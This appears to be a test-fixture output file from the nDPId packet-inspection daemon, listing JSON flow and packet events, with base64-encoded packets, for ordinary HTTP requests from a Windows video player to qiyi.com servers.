+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00795{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1467353156641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":311,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":311,"pkt_l4_len":277,"thread_ts_msec":1467353156641,"pkt":"TF4M6gNlABxCjnAxCABFAAEpDsFAAIAGbi7AqHMI3xpqFMU4AFDYI3WbArNbVVAYAQSIDAAAR0VUIC8yMDE2MDYyNS9hNS9iZi80MTNmOTFhZDEwMWU3ODBhNmI2M2Y4MjZlMjhiOTkyMC54bWwgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1ldGEudmlkZW8ucWl5aS5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOjUwMDQ5NDYwMF8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} 
+00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7560000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"meta.video.qiyi.com","url":"meta.video.qiyi.com\/20160625\/a5\/bf\/413f91ad101e780a6b63f826e28b9920.xml","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1467353156699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353156699,"pkt":"ABxCjnAxTF4M6gNlCABFAAUU\/f1AADgGwwbfGmoUwKhzCABQxTgCs1tV2CN2nFAQAB+1jgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNTo1NiBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC94bWwNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDI1IEp1biAyMDE2IDA2OjA4OjM2IEdNVA0KRXhwaXJlczogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjo1MCBHTVQNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MzAwDQpYLUNhY2hlOiBmcm9tIDEwLjEyMS4zNC4xNDANCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45OA0KWC1DYWNoZTogRVhQSVJFRCBmcm9tIDIyMy4yNi4xMDYuMjANCg0KNWZlDQofiwgAAAAAAAADhZnrbhs5DIX\/9ykCP8BEFC+SAHf6KIuxM26NzaWtnezl6fewDtIUXdIpUNvjY4n6SJHizPbT3w\/3Ny\/r99Px6fHjhqayufk0f9gejvfraT3PH262h\/uXm8flYf24KTtalr7wbmfrfuyoDO1dZLfXhdbdbj9BusFPbrZf1uPnL+
eZrWxvX9\/75b+Od+cvswmuXt76xfPxYT2dl4ev+6fH8\/Hx+en5NNP29v8uu\/yHZcd\/17kXbaXK9vbtin999\/x9OWMtM2mf2Nr29u2Kf\/1yvFuf\/jgvn+cyCv64+v8\/\/6i9vSfYWehwOKyE1ztrl8\/LXq1KWUo9HIYZXv1fv\/yMS7m8oyGt76nv1QfBl2p97WM51P1FWfhue\/vTGrdteb47vtp2GeSHha9yvCwHDMUDQ626qFw0uE5g8PO3PtKf6z+H73DZaf32vD7u15M75d3lHx9fyV\/eg8xy\/7zeHO\/g5s1cJowL+\/za7wK6JqibmaZR4xF4M3MqkM2sqUA3c0sFtpnHBEbhKhqMpAmeCxUdCk4VAwpNFQSa1HIJeNLIJSBac2MJTGtuLYFqvWIuuFabWuI7AtnacwnYcsklgMs1l4AuSyqpoMu5uRV0OTe3gq7k5lbQldzcCroikyUBVUFXLJeAriCyPXMG26+CroxJEx9V0NUyWRL+FXS1pqMw6KrkEtBVyyWgi1ycmcugayWXgK5RuiIGXeOpeHkJ0DHomkxI+rEEdM1yCehazyWga2OSxBYB3Ua5BHRbTeNFQLdJumgB3aaTJiEloNtaLvGMi6jLRgHdTrkEdDvnEtDtV8wF3Q5zkx2goNvhgGQ3KugOOCCTgO7gXAK6Q3MJ6I6WS0B3XDEXdKlcsRd4qdSpZ2sCXyoy4egTbgIFYCqWhpWBMJWea4CYCKeJZB8YGBPVXAPIRHmYGygTXbEZmImu2Oyc6xWbnXO9YrNzrldsds6otxmf5pxRcFONc0bFTTXOGSU31Thn1NxU45xRdFONc0bVzU6RzTnzSFN6c84ozek5zjmjNqca54zinGm6c0Z1bkmG685ZcJrINM4ZxTfVOGeldJ9256yca5yzaq5xztp+07y2WK+9gDdRX59OR++dLu2Cd0vve4JaK7qpoLCCS2Wy8Htn0uHJGipAhNHRUTwH"} +01353{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1467353156700,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":721,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":721,"pkt_l4_len":687,"thread_ts_msec":1467353156700,"pkt":"ABxCjnAxTF4M6gNlCABFAALD\/f5AADgGxVbfGmoUwKhzCABQxTgCs2BB2CN2nFAYAB9NTQAAeAj6KkVzGFgBGjLKoHgWsNDOg9EyBWMg4qw3sngWxFvTJslqEW1dOtsIZ\/G2YAiauUTisVZE0efGwzjXWg05LdZ4rAky0eBYc4m1ISOZy2PN0IHWZC6PtYYzQuJG8j0ND\/TECQTGtXRrmc2gXLGqInHIeH+AZh3hH4eENwhVsfKSjAPO1cTSYzk4VwRGT0LHe4TarWqyLm8S6mgVURj6q4IzFzPKNODMJE042ZbgzNQZongucObqtx3iTeOdAgtOFElsMDiz4j7IiGOewZkNmDWZyzNFp1ZHvEUZnLk3hGq8dm8XeCg2YczZ+wUeo3ON9wWDs+AA03qiAWdBguyZBpyFEaoU8\/GeQWCxJqlYwFm0ElwW+tS7BtGB8In5eNsgxoYYisfxnNwQiUliF8\/KHRWxxZwFnLGTCyWxIc55GI5LybrAWQsivsW+EHBWpMMucU7w7kGRWyyJeW8flHELMtOAswKQchyrCs6qvbWEs4Kz2mjW4n2q4IzsMyyJDQVn3LPtqKOhTxWcdXQc7RMNOFtBRUl8
4T0EvFVRbcO5vIcwFIPOsU8NnJExccMztsd7CARqqdlc4IxwNkRibA84m1Rl7rEGnA1No1kcPwbOptwRi\/E44GyK5JL0auaczVRLvE\/NOTdmsdhm7yG8mHJSC5pz7grS8T5tznl40Y3X3pwzVoX9E669gXMrSszJXODcCF1fS8YBZ9yrRE6I97v3EKimuN8fx2ED54ZUh6iPbQbnJlpQLEON9xDNzxJJTvAeopn2mnDu4Nya74w45js4t45NmNQ47yFa70xJ7u3OefiZN1kXOHesvIxf4\/Dy8OXXvmF7+\/b4wXuLdx\/fPY3AD+9f8Jzp8vDGHzT9Byu2GoeKGgAADQowDQoNCg=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00719{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1467353156959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1467353156959,"pkt":"TF4M6gNlABxCjnAxCABFAADvDvNAAIAGMe3AqHMId7wNvMU5AFAa+1ILYx41VVAYAQTDtAAAR0VUIC9rIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBwZGF0YS52aWRlby5xaXlpLmNvbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="} 
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/k","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00955{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1467353156998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":430,"pkt_l4_len":396,"thread_ts_msec":1467353156998,"pkt":"ABxCjnAxTF4M6gNlCABFAAGgqmFAADQG4c13vA28wKhzCABQxTljHjVVGvtS0lAYAB+FPAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtTGVuZ3RoOiAyMDQNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCnsidCI6IjE0NjczNTMxNTYiLCJtIjoiZWMyZmQ2Njc4YTM1N2MyMDhkNTE4NmIzYzM0MjI0NmJlZTQ0YzUwY2U3MDgzOTNlIiwidSI6ImVjMmZkNjY3OGEzNTdjMjBmNTVhODJlZDYwZjYzZjk2Y2QyMDlhMWQ4OGI3ODQyNSIsImkiOiIyMjAuMTgxLjEwOS4zMyIsImsiOiJlYzJmZDY2NzhhMzU3YzIwNjI1MTY2M2U4NGQ3MDFkOTlkYjQyZTUxY2I5MWM1MzkifQ=="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1467353157063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1467353157063,"pkt":"TF4M6gNlABxCjnAxCABFAAFXDwhAAIAGMXDAqHMId7wNvMU6AFAWZyP1RIzmWFAYAQR4owAAR0VUIC8yZWZjOGNkNWZiZTBmNGVlNDk4ZmIxYzJmYzFkZThiNi92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2PyZ0bj0xMzc3MTkgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IHBkYXRhLnZpZGVvLnFpeWkuY29tDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} 
+00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?&tn=137719","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01021{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1467353157103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":479,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":479,"pkt_l4_len":445,"thread_ts_msec":1467353157103,"pkt":"ABxCjnAxTF4M6gNlCABFAAHRefhAADQGEgZ3vA28wKhzCABQxTpEjOZYFmclJFAYAB\/Y6wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjUyDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJiZ0bj0xMzc3MTkmdXVpZD03NmEzMDg1YS01Nzc2MDg0NC1kZSIsImUiOiIwIn0="} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7560000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"thread_ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1467353157138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":426,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":426,"pkt_l4_len":392,"thread_ts_msec":1467353157138,"pkt":"TF4M6gNlABxCjnAxCABFAAGcDxlAAIAGbTXAqHMI3xpqQsU7AFAuAjEcSma44VAYAQTWMgAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSYmdG49MTM3NzE5JnV1aWQ9NzZhMzA4NWEtNTc3NjA4NDQtZGUgSFRUUC8xLjENClJhbmdlOiBieXRlcz0wLTQwOTU5DQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiAyMjMuMjYuMTA2LjY2DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDo1MDA0OTQ2MDBfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7560000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"thread_ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
+02177{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1467353157142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353157142,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUui5AADgGBqjfGmpCwKhzCABQxTtKZsK5LgIykFAQAB\/uTwAAXABAYzwo9cKPXABAY3wo9cKPXABAY7wo9cKPXAAACQAACKIJAAAyAAAAAAAAABcAAAAAAWQAH\/\/hAB1nZAAfrFYkCgL\/lmoCAgKAAAADAIAAABlHjBjFQAEABWjomvLAAAAAPQgAAAkAAAAAAAAArwATkFblpUgAAAAAFAkAbwgAAAAAAAAAFwEAAFAAAG7\/ZYiCABX\/95xkfm3FH8zfxiVyZItj2+QvcPG\/css\/ZW+K7oKmOXqvyof6+MpsbuBrR3NlYBBVWVRq3WcvPz43KJn6OOq7wUatnW33K69XETXFsUoSgXdN7o0kq4w+hJrrFVm3jhsmgXWVk6qs6hebWuZRXfCylsvlyYQvoo8ujkxwf\/jOPhyl6i\/pTDKbDQZOrGmk9iGos+6hcPjtrVmq5rC28bSpDQb\/l3J+48zXTAIJQ0eBYWXFdgZPT7ei\/1f\/9\/tmNrD8GxGJp2OeeHzKlWg0+2iCixox6opp5+CbF3ew+UCOGdg3U\/5oVyFXyPX7+O0Is6zwfWwGCWJoC6\/zQa49qCQPS9W27Dn4e7vsWHcsLdg3UHzR4Z1JuDFBW7ue0EA3sC0gP\/mqqJuTdXptxBOJRjQ63vSnOV7PtDcJs4A7oWz2JzmEh+VbAw2U5760xCgZf0h+IR4GdMhaD57XDY8NdoZSDUzKAjvVKzHkc\/gdXpR0l6TIGuQcP2n5BFznR2iYeCE\/miwzmIeVW7avmSkaYobdmdMxT40yLpSDo7E8P+71xqJEqUUh6vFl9rz126Cgazh0LClcgaFaNKcZScAJKPrVP1o7kkOIcKwxW2CdOD77SH4zyVYWD9ULtNPIZ77Kl\/LYJQ8L2R419x+V6vNClYH7FDNYQst\/D12fjQ\/m+4yqq8ANYgNFZAXKlC8uKiIfcH\/TAErY7s8c2cJx1lhY3xTKhpLrPcsLU9UsA+Oip34KoUwvW3F5sUP0n2c\/KNlUH5ayGqegy5bryGeYm\/zuaor3RjqVC+afHCqaNQNUM+bdihsi6\/dYDdiuHkznFARXAj+HmRzPclqFdQs0umlOh+4nrXrTgUTsq6Mijt5YgP1vOKM5AtjEldVCDmGr1tU5uzTP\/wOgMtD4fsuENAnY849iMY16mjQC8PBzOazume30AYsAvNe5umLe2Jg9g1q77PVd7s5Hu\/6sIJWIf7my9bXHqgu1vXqQE6ohulSfKXSbeWRxV1zDne\/VQKrMqsiN5thBJ6eGrmP690VCEON3vIc3K8eMxOBEG1sH2gt0\/QY+qtme7NqWlgnah6YGN282gbUWFJTA8lul4VGFodu6rBHcO4b\/OZ2Vgodz1eVa7Rvhlz0zeO\/YLtQjl7fwTfVY1piKLJlsXBuH5KXSLNolBVVHCVrAQmkekZvhiLsm\/G4SGTer+1uPrS5m3ZHSe234ovyt+yHtfZCEP\/\/gOVJ5LO7C7uAyroC7rFx6lIcBOyO9mnt4Fi0rv6nmI9Iuf1\/XjKYeJJ3hPNphBZXvUwpvdJUyrMP\/WS
Qf4xrhUZbkn+wcvgAg5Hq\/N\/ilxIaAfekOtHVgU5VwnYm0lrbpwZtnYoLYol2itsi\/Tiny8B2OHcGdfUzCAOCON\/0+\/ipakxXBeRa7CLgs5mjI+rNnEby8whMLuruKRetpD4LDPViHWG\/OwHoZ14S6hpwBDqQ07xh3U7DjW9xs4GqS"} +02162{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1467353157142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353157142,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUui9AADgGBqffGmpCwKhzCABQxTtKZselLgIykFAQAB\/aLgAAopnkFb6w\/Gf9wcd\/TnuexQBjLwWa0uCe9TPr4qE3jsphraOf\/lM4Hhi9NJILTNUPpkUh0lJVsTBg0+IryxSW3IwYySV6wkzB0\/tYDwbO6SOx\/W5mmrffIH5hc9hR+iJYkdxSMJyhs5tL+JX3Z4urkWLC21HQmnbWWhKwwr3IOESy8lC4QLT5bzgZZwV6aylc3BKRGmkWqvo3gveBLOrAMA4JoqHhbMBYA7GEB3n5XVRePARG35OUMCE\/8TDQo0+dLC24GKANopCzYZkvfPVaY0dRDrv50emXg1Cs9WSfVu50aDF7YYVdx5mx545GrUAMEsqIjDQ\/4DCox7xS+Ws\/dwFhUTJ0P8Dx\/xK2lp12JPYf\/zG6tdTYMt3AacBTBvLHFFde\/reBoQaTbZB\/vJdywKaKtIzwqCOs4Q9YPbL8+Pq1VE1FdEBeuONtnWPx9wNuAvH6U\/JENWXsD\/bsjom76483YU\/XZIQUgj30cOEgQwuDamiBln+90aAngeN2nOL6ntmgjdG66Xp5PKfwQlwuGdvacgApEFyIvnfxUhm77eXRcDexRzOKtayXJEIXZt52rm2WbDXx+l2L+n6mDI5HPlSGKuvP84rwmMwhT7yEvzQKbivh5sn9I8EjZx6KaukURUZTKe54jHmLC3Jmf2BKkUKfD+otim\/knbUQxDjsPRmRG1Nf5oF86K6KEl\/nFEI9A5kcjFcko+VuDqw9SWzSXgKad5EYc4r+hlUwt3uzj59viQUjCCWYguaIGZ8C5ZjdSExE6IsY1BXoMFqHoRzfJaDg6uSsFAjJS92cQgN0nWwTaQFWx1m2slB35iQ1wft22PbPDl49icFcTFpAz2oY5Pp3lfvj5IUJyUTHt3u8v74exA53o9ooOtbqs2j42om\/zaB3iyhBCsOikAKzbr0K6CxGSwBAWdloUe96BLdalzPNcqhIK0c0YJvH4tBdmDh+5ufseEBw7BGI2ipV6yVNpFO0kDqCajN7YsN05JDg13dAXzY2SAQ5QfKni3cz7N9WhYMt7COKUvI+C0iwIaEB32bniucRrN4HsPO11eCbWDnltN\/+kP2qhoa5r1DcSUAZq6JPm51\/USDg6qO4x\/Vapf6ZVCWehE+KdgGpX4qBTKeA+bV7qois7qvnsCmBXUWPo21DtRYTVMizQCWWQqH0CGGSEtoZ24ZE8Em+sX59yNgKKKnBzY4rxhy1pF8qyBkoHpDm9lBx3JEleYOnrbk5vilJTiHsG0C7im31hM5hXvKl2rEhKIpc+QgsAwc8xEkz7398lWjZRYNmVmvhEG3GTaIjL7zuDYVBFnz\/Ep+CquTSroYI\/KVwc+2z
e3Q+yBDcODi+bFdRr\/qJ\/RfL4FgeDb9sduAkPb3xQiixfjLzyzTazf6dzG3+S06aSi8zpu2nZ2pA6Ukh\/FodlR311cw8YfsxYuiSFyYqZDzpce1Qm0XZXnys8qlDnUmjILug1tlJBa1UzH74juRDwgD0Fnwh1MLjNAsmUIrgA0GSsiEjUBU047yfXV\/qzyvQus+1BXKIiklyV0Xin7L0ua0Yj38t6gGn+ytwXAmSh71WYg7o3suhEh2DpzfHKZ9IBKf8gIvOvhTvSepAfXGEaca4phlMY6YIuwsde9HzRk9q6m3wLv6MKf1l9nyMKAHgaDMdK68E7LAU50IjtX2yCF8K"} +01059{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1055,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353157138,"flow_last_seen":1467353157142,"flow_idle_time":7560000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2892,"flow_avg_l4_payload_len":964,"midstream":1,"thread_ts_msec":1467353157142,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
